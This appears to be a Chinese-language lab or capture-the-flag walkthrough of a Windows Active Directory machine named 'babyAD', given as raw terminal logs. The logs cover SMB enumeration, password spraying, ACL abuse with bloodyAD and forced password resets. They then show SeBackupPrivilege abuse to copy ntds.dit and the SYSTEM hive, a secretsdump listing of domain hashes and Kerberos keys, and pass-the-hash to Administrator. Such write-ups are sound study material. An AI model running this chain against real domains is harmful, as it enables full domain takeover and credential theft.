babyAD
1. User
1.1. 端口扫描
┌──(root㉿kali)-[~/Desktop/machines/babyAD]
└─# nmap 192.168.1.5 --min-rate 10000
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-03 06:22 EST
Nmap scan report for 192.168.1.5
Host is up (0.00037s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
MAC Address: 00:0C:29:AC:31:59 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 5.55 seconds
┌──(root㉿kali)-[~/Desktop/machines/babyAD]
└─# nmap 192.168.1.5 -p 53,88,135,139,389,445,464,593,636,3268,3269,5985 -sCV -O
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-03 06:24 EST
Nmap scan report for 192.168.1.5
Host is up (0.00051s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-01-03 11:24:28Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: babyAD.com0., Site: Default-Fi
rst-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: babyAD.com0., Site: Default-Fi
rst-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
MAC Address: 00:0C:29:AC:31:59 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2022|11|2016 (97%)
OS CPE: cpe:/o:microsoft:windows_server_2022 cpe:/o:microsoft:windows_11 cpe:/o:microsoft:windows_server_201
6
Aggressive OS guesses: Microsoft Windows Server 2022 (97%), Microsoft Windows 11 21H2 (91%), Microsoft Windo
ws Server 2016 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: Host: BABYAD; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_nbstat: NetBIOS name: BABYAD, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:ac:31:59 (VMware)
| smb2-time:
| date: 2026-01-03T11:24:33
|_ start_date: N/A
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 50.76 seconds
1.2. SMB
┌──(root㉿kali)-[~/Desktop/machines/babyAD]
└─# nxc smb 192.168.1.5 -u 'guest' -p '' --shares
SMB 192.168.1.5 445 BABYAD [*] Windows Server 2022 Build 20348 x64 (name:BABYAD) (domain:babyAD.com) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 192.168.1.5 445 BABYAD [+] babyAD.com\guest:
SMB 192.168.1.5 445 BABYAD [*] Enumerated shares
SMB 192.168.1.5 445 BABYAD Share Permissions Remark
SMB 192.168.1.5 445 BABYAD ----- ----------- ------
SMB 192.168.1.5 445 BABYAD ADMIN$ 远程管理
SMB 192.168.1.5 445 BABYAD C$ 默认共享
SMB 192.168.1.5 445 BABYAD IPC$ READ 远程 IPC
SMB 192.168.1.5 445 BABYAD NETLOGON Logon server share
SMB 192.168.1.5 445 BABYAD SYSVOL Logon server share
SMB 192.168.1.5 445 BABYAD Technical Security Notice READ
┌──(root㉿kali)-[~/Desktop/machines/babyAD]
└─# nxc smb 192.168.1.5 -u '' -p '' --generate-hosts-file hosts
SMB 192.168.1.5 445 BABYAD [*] Windows Server 2022 Build 20348 x64 (name:B
ABYAD) (domain:babyAD.com) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 192.168.1.5 445 BABYAD [+] babyAD.com\:
┌──(root㉿kali)-[~/Desktop/machines/babyAD]
└─# nxc smb 192.168.1.5 -u '' -p '' --generate-krb5-file /etc/krb5.conf
cat SMB 192.168.1.5 445 BABYAD [*] Windows Server 2022 Build 20348 x64 (na
me:BABYAD) (domain:babyAD.com) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 192.168.1.5 445 BABYAD [+] krb5 conf saved to: /etc/krb5.conf
SMB 192.168.1.5 445 BABYAD [+] Run the following command to use the conf f
ile: export KRB5_CONFIG=/etc/krb5.conf
SMB 192.168.1.5 445 BABYAD [+] babyAD.com\:
h
┌──(root㉿kali)-[~/Desktop/machines/babyAD]
└─# cat hosts
192.168.1.5 BABYAD.babyAD.com babyAD.com BABYAD
┌──(root㉿kali)-[~/Desktop/machines/babyAD]
└─# cat hosts >> /etc/hosts
┌──(root㉿kali)-[~/Desktop/machines/babyAD]
└─# impacket-smbclient 'guest:@192.168.1.5'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
Password:
Type help for list of commands
# shares
ADMIN$
C$
IPC$
NETLOGON
SYSVOL
Technical Security Notice
# use 'Technical Security Notice'
# use Technical Security Notice
# ls
drw-rw-rw- 0 Fri Dec 26 23:10:12 2025 .
drw-rw-rw- 0 Fri Dec 26 23:27:54 2025 ..
-rw-rw-rw- 5045 Fri Dec 26 23:10:12 2025 技术安全通告.pdf
# get 技术安全通告.pdf
# exit
1.3. RID_Cycling
┌──(root㉿kali)-[~/Desktop/machines/babyAD]
└─# nxc smb 192.168.1.5 -u 'guest' -p '' --rid-brute
SMB 192.168.1.5 445 BABYAD [*] Windows Server 2022 Build 20348 x64 (name:B
ABYAD) (domain:babyAD.com) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 192.168.1.5 445 BABYAD [+] babyAD.com\guest:
SMB 192.168.1.5 445 BABYAD 498: BABYAD0\Enterprise Read-only Domain Contro
llers (SidTypeGroup)
SMB 192.168.1.5 445 BABYAD 500: BABYAD0\Administrator (SidTypeUser)
SMB 192.168.1.5 445 BABYAD 501: BABYAD0\Guest (SidTypeUser)
SMB 192.168.1.5 445 BABYAD 502: BABYAD0\krbtgt (SidTypeUser)
SMB 192.168.1.5 445 BABYAD 512: BABYAD0\Domain Admins (SidTypeGroup)
SMB 192.168.1.5 445 BABYAD 513: BABYAD0\Domain Users (SidTypeGroup)
SMB 192.168.1.5 445 BABYAD 514: BABYAD0\Domain Guests (SidTypeGroup)
SMB 192.168.1.5 445 BABYAD 515: BABYAD0\Domain Computers (SidTypeGroup)
SMB 192.168.1.5 445 BABYAD 516: BABYAD0\Domain Controllers (SidTypeGroup)
SMB 192.168.1.5 445 BABYAD 517: BABYAD0\Cert Publishers (SidTypeAlias)
SMB 192.168.1.5 445 BABYAD 518: BABYAD0\Schema Admins (SidTypeGroup)
SMB 192.168.1.5 445 BABYAD 519: BABYAD0\Enterprise Admins (SidTypeGroup)
SMB 192.168.1.5 445 BABYAD 520: BABYAD0\Group Policy Creator Owners (SidTy
peGroup)
SMB 192.168.1.5 445 BABYAD 521: BABYAD0\Read-only Domain Controllers (SidT
ypeGroup)
SMB 192.168.1.5 445 BABYAD 522: BABYAD0\Cloneable Domain Controllers (SidT
ypeGroup)
SMB 192.168.1.5 445 BABYAD 525: BABYAD0\Protected Users (SidTypeGroup)
SMB 192.168.1.5 445 BABYAD 526: BABYAD0\Key Admins (SidTypeGroup)
SMB 192.168.1.5 445 BABYAD 527: BABYAD0\Enterprise Key Admins (SidTypeGrou
p)
SMB 192.168.1.5 445 BABYAD 553: BABYAD0\RAS and IAS Servers (SidTypeAlias)
SMB 192.168.1.5 445 BABYAD 571: BABYAD0\Allowed RODC Password Replication
Group (SidTypeAlias)
SMB 192.168.1.5 445 BABYAD 572: BABYAD0\Denied RODC Password Replication G
roup (SidTypeAlias)
SMB 192.168.1.5 445 BABYAD 1000: BABYAD0\BABYAD$ (SidTypeUser)
SMB 192.168.1.5 445 BABYAD 1101: BABYAD0\DnsAdmins (SidTypeAlias)
SMB 192.168.1.5 445 BABYAD 1102: BABYAD0\DnsUpdateProxy (SidTypeGroup)
SMB 192.168.1.5 445 BABYAD 1103: BABYAD0\acc_admins (SidTypeGroup)
SMB 192.168.1.5 445 BABYAD 1104: BABYAD0\wackymaker (SidTypeUser)
SMB 192.168.1.5 445 BABYAD 1105: BABYAD0\babyad-admin (SidTypeUser)
SMB 192.168.1.5 445 BABYAD 1106: BABYAD0\backup-opt (SidTypeUser)
SMB 192.168.1.5 445 BABYAD 1107: BABYAD0\server-opt (SidTypeUser)
SMB 192.168.1.5 445 BABYAD 1108: BABYAD0\accn-opt (SidTypeUser)
┌──(root㉿kali)-[~/Desktop/machines/babyAD]
└─# nxc smb 192.168.1.5 -u valid_user.txt -p valid_user.txt --no-bruteforce
SMB 192.168.1.5 445 BABYAD [*] Windows Server 2022 Build 20348 x64 (name:BABYAD) (domain:babyAD.com) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 192.168.1.5 445 BABYAD [-] babyAD.com\Administrator:Administrator STATUS_LOGON_FAILURE
SMB 192.168.1.5 445 BABYAD [-] babyAD.com\Guest:Guest STATUS_LOGON_FAILURE
SMB 192.168.1.5 445 BABYAD [-] babyAD.com\krbtgt:krbtgt STATUS_LOGON_FAILURE
SMB 192.168.1.5 445 BABYAD [-] babyAD.com\BABYAD$:BABYAD$ STATUS_LOGON_FAILURE
SMB 192.168.1.5 445 BABYAD [-] babyAD.com\wackymaker:wackymaker STATUS_PASSWORD_MUST_CHANGE
SMB 192.168.1.5 445 BABYAD [-] babyAD.com\babyad-admin:babyad-admin STATUS_LOGON_FAILURE
SMB 192.168.1.5 445 BABYAD [-] babyAD.com\backup-opt:backup-opt STATUS_LOGON_FAILURE
SMB 192.168.1.5 445 BABYAD [-] babyAD.com\server-opt:server-opt STATUS_LOGON_FAILURE
SMB 192.168.1.5 445 BABYAD [-] babyAD.com\accn-opt:accn-opt STATUS_LOGON_FAILURE
改下密码
┌──(root㉿kali)-[~/Desktop/machines/babyAD]
└─# nxc smb 192.168.1.5 -u wackymaker -p wackymaker -M change-password -o NEWPASS=Admin123
SMB 192.168.1.5 445 BABYAD [*] Windows Server 2022 Build 20348 x64 (name:BABYAD) (domain:babyAD.com) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 192.168.1.5 445 BABYAD [-] babyAD.com\wackymaker:wackymaker STATUS_PASSWORD_MUST_CHANGE
CHANGE-P... 192.168.1.5 445 BABYAD [+] Successfully changed password for wackymaker ┌──(root㉿kali)-[~/Desktop/machines/babyAD]
└─# nxc smb 192.168.1.5 -u wackymaker -p Admin123
SMB 192.168.1.5 445 BABYAD [*] Windows Server 2022 Build 20348 x64 (name:BABYAD) (domain:babyAD.com) (signing:True)
(SMBv1:None) (Null Auth:True)
SMB 192.168.1.5 445 BABYAD [+] babyAD.com\wackymaker:Admin123
┌──(root㉿kali)-[~/Desktop/machines/babyAD]
└─# nxc winrm 192.168.1.5 -u wackymaker -p Admin123
WINRM 192.168.1.5 5985 BABYAD [*] Windows Server 2022 Build 20348 (name:BABYAD) (domain:babyAD.com)
WINRM 192.168.1.5 5985 BABYAD [+] babyAD.com\wackymaker:Admin123 (Pwn3d!)
1.4. winrm
┌──(root㉿kali)-[~/Desktop/machines/babyAD]
└─# evil-winrm -i 192.168.1.5 -u wackymaker -p Admin123
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\wackymaker\Documents> whoami;hostname
babyad0\wackymaker
babyAD
*Evil-WinRM* PS C:\Users\wackymaker\Documents>
*Evil-WinRM* PS C:\Users\wackymaker\desktop> dir
*Evil-WinRM* PS C:\Users\wackymaker\desktop> gci -path c:\users user.txt
目录: C:\users
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 12/27/2025 11:55 AM 18 user.txt
*Evil-WinRM* PS C:\Users\wackymaker\desktop> gc c:\users\user.txt
a3f5c9e47d2b1a8f
2. System
2.1. bloodhound
*Evil-WinRM* PS C:\Users\wackymaker\desktop> upload SharpHound.exe
Info: Uploading /root/Desktop/machines/babyAD/SharpHound.exe to C:\Users\wackymaker\desktop\SharpHound.exe
Data: 1748308 bytes of 1748308 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\wackymaker\desktop> .\SharpHound.exe -c ALL
2026-01-03T20:09:25.0406600+08:00|INFORMATION|This version of SharpHound is compatible with the 5.0.0 Release of BloodHound
2026-01-03T20:09:25.1812350+08:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL,
Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote, UserRights, CARegistry, DCRegistry, CertServices, LdapServices, WebClientService,
SmbInfo, NTLMRegistry
2026-01-03T20:09:25.2125237+08:00|INFORMATION|Initializing SharpHound at 20:09 on 2026/1/3
2026-01-03T20:09:25.2437172+08:00|INFORMATION|Resolved current domain to babyAD.com
2026-01-03T20:09:25.3542563+08:00|INFORMATION|Flags: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote, UserRights, CARegistry, DCRegistry, CertServices, LdapServices, WebClientService, SmbInfo, NTLMRegistry
2026-01-03T20:09:25.4166617+08:00|INFORMATION|Beginning LDAP search for babyAD.com
...
2026-01-03T20:09:31.8660681+08:00|INFORMATION|Output channel closed, waiting for output task to complete
Closing writers
2026-01-03T20:09:31.9288670+08:00|INFORMATION|Status: 299 objects finished (+299 49.83333)/s -- Using 72 MB RAM
2026-01-03T20:09:31.9288670+08:00|INFORMATION|Enumeration finished in 00:00:06.5298466
2026-01-03T20:09:32.0071000+08:00|INFORMATION|Saving cache with stats: 20 ID to type mappings.
0 name to SID mappings.
1 machine sid mappings.
3 sid to domain mappings.
0 global catalog mappings.
2026-01-03T20:09:32.0227859+08:00|INFORMATION|SharpHound Enumeration Completed at 20:09 on 2026/1/3! Happy Graphing!
*Evil-WinRM* PS C:\Users\wackymaker\desktop> dir
目录: C:\Users\wackymaker\desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 1/3/2026 8:09 PM 28121 20260103200926_BloodHound.zip
-a---- 1/3/2026 8:09 PM 1566 N2Q4YzlmOWUtOGQxOC00ZmNiLTkzZjktNmJkOGZlYmQ5MzM4.bin
-a---- 1/3/2026 8:09 PM 1311232 SharpHound.exe
*Evil-WinRM* PS C:\Users\wackymaker\desktop> download 20260103200926_BloodHound.zip
Info: Downloading C:\Users\wackymaker\desktop\20260103200926_BloodHound.zip to 20260103200926_BloodHound.zip
Info: Download successful!
先把自己加到ACC_ADMINS组里面
┌──(root㉿kali)-[~/Desktop/BloodHound]
└─# bloodyAD --host BABYAD.babyAD.com -d babyAD.com -u 'wackymaker' -p 'Admin123' -k --dc-ip 192.168.1.5 set owner 'ACC_ADMINS' 'wackymaker'
[+] Old owner S-1-5-21-3649830887-1815587496-1699028491-512 is now replaced by wackymaker on ACC_ADMINS
┌──(root㉿kali)-[~/Desktop/BloodHound]
└─# bloodyAD --host BABYAD.babyAD.com -d babyAD.com -u 'wackymaker' -p 'Admin123' -k --dc-ip 192.168.1.5 add genericAll 'ACC_ADMINS' 'wackymaker'
[+] wackymaker has now GenericAll on ACC_ADMINS
┌──(root㉿kali)-[~/Desktop/BloodHound]
└─# bloodyAD --host BABYAD.babyAD.com -d babyAD.com -u 'wackymaker' -p 'Admin123' -k --dc-ip 192.168.1.5 add groupMember 'ACC_ADMINS' 'wackymaker'
[+] wackymaker added to ACC_ADMINS
然后改BABYAD-ADM的密码
┌──(root㉿kali)-[~/Desktop/machines/babyAD/ansi-colors]
└─# bloodyAD --host BABYAD.babyAD.com -k --dc-ip 192.168.1.5 -d babyAD.com -u 'wackymaker' -p 'Admin123' set password BABYAD-ADMIN Admin123
[+] Password changed successfully!
┌──(root㉿kali)-[~/Desktop/machines/babyAD/ansi-colors]
└─# nxc smb 192.168.1.5 -u BABYAD-ADMIN -p Admin123
SMB 192.168.1.5 445 BABYAD [*] Windows Server 2022 Build 20348 x64 (name:BABYAD) (domain:babyAD.com) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 192.168.1.5 445 BABYAD [+] babyAD.com\BABYAD-ADMIN:Admin123
┌──(root㉿kali)-[~/Desktop/machines/babyAD/ansi-colors]
└─# nxc winrm 192.168.1.5 -u BABYAD-ADMIN -p Admin123
WINRM 192.168.1.5 5985 BABYAD [*] Windows Server 2022 Build 20348 (name:BABYAD) (domain:babyAD.com)
WINRM 192.168.1.5 5985 BABYAD [+] babyAD.com\BABYAD-ADMIN:Admin123 (Pwn3d!)
┌──(root㉿kali)-[~/Desktop/machines/babyAD]
└─# bloodyAD --host BABYAD.babyAD.com -k --dc-ip 192.168.1.5 -d babyAD.com -u 'BABYAD-ADMIN' -p 'Admin123' set
password BACKUP-OPT Admin123
[+] Password changed successfully!
┌──(root㉿kali)-[~/Desktop/machines/babyAD]
└─# nxc smb 192.168.1.5 -u BACKUP-OPT -p Admin123
SMB 192.168.1.5 445 BABYAD [*] Windows Server 2022 Build 20348 x64 (name:BABYAD) (domain:babyAD.com) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 192.168.1.5 445 BABYAD [+] babyAD.com\BACKUP-OPT:Admin123
*Evil-WinRM* PS C:\Users\backup-opt\Documents> whoami /priv
特权信息
----------------------
特权名 描述 状态
============================= ================ ======
SeMachineAccountPrivilege 将工作站添加到域 已启用
SeBackupPrivilege 备份文件和目录 已启用
SeRestorePrivilege 还原文件和目录 已启用
SeShutdownPrivilege 关闭系统 已启用
SeChangeNotifyPrivilege 绕过遍历检查 已启用
SeIncreaseWorkingSetPrivilege 增加进程工作集 已启用
*Evil-WinRM* PS C:\Users\backup-opt\Documents>
2.2. 卷影备份
*Evil-WinRM* PS C:\temp> diskshadow /s raj.dsh
Microsoft DiskShadow 版本 1.0
版权所有 (C) 2013 Microsoft Corporation
在计算机上: BABYAD,2026/1/3 23:26:01
-> set context persistent nowriters
-> add volume c: alias raj
-> create
已将卷影 ID {c517776e-4909-438e-939e-9075f39a773a} 的别名 raj 设置为环境变量。
已将卷影集 ID {eeb0e07c-db9d-4383-8ea8-e717ceec7542} 的别名 VSS_SHADOW_SET 设置为环境变量。
正在查询卷影副本集 ID 为 {eeb0e07c-db9d-4383-8ea8-e717ceec7542} 的所有卷影副本
* 卷影副本 ID = {c517776e-4909-438e-939e-9075f39a773a} %raj%
- 卷影副本集: {eeb0e07c-db9d-4383-8ea8-e717ceec7542} %VSS_SHADOW_SET%
- 卷影副本原始数 = 1
- 原始卷名称: \\?\Volume{ed91bad1-0000-0000-0000-500600000000}\ [C:\]
- 创建时间: 2026/1/3 23:26:01
- 卷影副本设备名称: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
- 原始计算机: babyAD.babyAD.com
- 服务计算机: babyAD.babyAD.com
- 未暴露
- 提供程序 ID: {b5946137-7b9f-4925-af80-51abd60b20d5}
- 属性: No_Auto_Release Persistent No_Writers Differential
已列出的卷影副本数: 1
-> expose %raj% z:
-> %raj% = {c517776e-4909-438e-939e-9075f39a773a}
已成功将卷影副本暴露为 z:\。
->
*Evil-WinRM* PS C:\temp> robocopy /b z:\windows\ntds . ntds.dit
-------------------------------------------------------------------------------
ROBOCOPY :: Windows 的可靠文件复制
-------------------------------------------------------------------------------
开始时间: 2026年1月3日 23:26:10
源: z:\windows\ntds\
目标: C:\temp\
文件: ntds.dit
选项: /DCOPY:DA /COPY:DAT /B /R:1000000 /W:30
------------------------------------------------------------------------------
1 z:\windows\ntds\
新文件 16.0 m ntds.dit
0.0%
0.3%
0.7%
1.1%
1.5%
1.9%
2.3%
2.7%
...
------------------------------------------------------------------------------
总数 复制 跳过 不匹配 失败 其他
目录: 1 0 1 0 0 0
文件: 1 1 0 0 0 0
字节: 16.00 m 16.00 m 0 0 0 0
时间: 0:00:00 0:00:00 0:00:00 0:00:00
速度: 270,600,258 字节/秒。
速度: 15,483.871 MB/分钟。
已结束: 2026年1月3日 23:26:10
*Evil-WinRM* PS C:\temp> reg save hklm\system c:\Temp\system
操作成功完成。
*Evil-WinRM* PS C:\temp> cd C:\Temp
*Evil-WinRM* PS C:\Temp> download ntds.dit
Info: Downloading C:\Temp\ntds.dit to ntds.dit
Info: Download successful!
*Evil-WinRM* PS C:\Temp> download system
Info: Downloading C:\Temp\system to system
Info: Download successful!
*Evil-WinRM* PS C:\Temp>┌──(root㉿kali)-[~/Desktop/machines/babyAD]
└─# impacket-secretsdump -ntds ntds.dit -system system local
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: 0x9aec2145c768b9975d683cbd0b2138e0
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: ca0a78b7f0d8e8d570163049c1742318
[*] Reading and decrypting hashes from ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:bbabdc192282668fe5190ab0c5150b34:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
BABYAD$:1000:aad3b435b51404eeaad3b435b51404ee:1eb9a569e97548b6a4629f64979a193c:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:6fab09b974ecbb7ba5447a076f494689:::
wackymaker:1104:aad3b435b51404eeaad3b435b51404ee:838e18ea954162b03ddea84fa0284139:::
babyad.com\babyad-admin:1105:aad3b435b51404eeaad3b435b51404ee:656d231c131a8f1ea8fd1138b8185674:::
backup-opt:1106:aad3b435b51404eeaad3b435b51404ee:5ad41e36af059c77865edbc22925c33c:::
server-opt:1107:aad3b435b51404eeaad3b435b51404ee:d99f9d8da6dad6dcae6b0d96104a445b:::
accn-opt:1108:aad3b435b51404eeaad3b435b51404ee:b9a7a7fcc60bdb049811e7c7388112a3:::
[*] Kerberos keys from ntds.dit
Administrator:aes256-cts-hmac-sha1-96:0218bc05d978eff9d49b5578b0b82d2b6f6fd19b47b55f91c07a555dac208574
Administrator:aes128-cts-hmac-sha1-96:4f3a074e29171c06ab3db041c1be2128
Administrator:des-cbc-md5:34701ccb6efb9704
BABYAD$:aes256-cts-hmac-sha1-96:37cbade9fb078f11a30748756fd92ff7c64af78ca036f546c7ee10326ee3cf20
BABYAD$:aes128-cts-hmac-sha1-96:d896106e4587e25cb645b44c5f2aef0c
BABYAD$:des-cbc-md5:d3b02ac8106ba89e
krbtgt:aes256-cts-hmac-sha1-96:d24121bf2b99d3645b4d7360107674ba6e9f3c55ba79d3d508906e29f1e8a81e
krbtgt:aes128-cts-hmac-sha1-96:5ed92e70800a8bc3da8e8a9220807d5e
krbtgt:des-cbc-md5:2546020262f197a7
wackymaker:aes256-cts-hmac-sha1-96:9f8fc1b72c86c3881697938460386a078d0e062c07773f60961b5ef037571977
wackymaker:aes128-cts-hmac-sha1-96:2ef671fea3cbc6a11689c264636cf316
wackymaker:des-cbc-md5:0b7a079edae54c9e
babyad.com\babyad-admin:aes256-cts-hmac-sha1-96:29f8a0be305a6a998fd0cb2798e3701f971370c9131d3e2369a13e2750130bc5
babyad.com\babyad-admin:aes128-cts-hmac-sha1-96:63a252cbc4cdc9ceeadea523d04b6673
babyad.com\babyad-admin:des-cbc-md5:f4983204910dbc62
backup-opt:aes256-cts-hmac-sha1-96:e6bd82c49938190ac40fc85355f3c1bb4e8d9739b2e33f9f7d9966b9664cbc12
backup-opt:aes128-cts-hmac-sha1-96:37dc64a75ed9200fcbf844e2d0f4c3ed
backup-opt:des-cbc-md5:98e68c7c892a1fe5
server-opt:aes256-cts-hmac-sha1-96:58ce476e9085de94eefb9fde291703bc6bfc98085f9130fca1af4f17cc9f2f54
server-opt:aes128-cts-hmac-sha1-96:83694fead3994f8afe47736c447dd676
server-opt:des-cbc-md5:2f91d026abdaae08
accn-opt:aes256-cts-hmac-sha1-96:3c0003e231985e6cefb136450c1e3c2c597377f15156402e76c503f7604f5949
accn-opt:aes128-cts-hmac-sha1-96:bfe789b2a8141a2081540ac6262424a9
accn-opt:des-cbc-md5:457acdf425c80d68
[*] Cleaning up...
┌──(root㉿kali)-[~/Desktop/machines/babyAD]
└─# evil-winrm -i 192.168.1.5 -u administrator -H bbabdc192282668fe5190ab0c5150b34
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoamibabyad0\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> gc ../desktop/root.txt6e9d14c2b7f08a53
*Evil-WinRM* PS C:\Users\Administrator\Documents>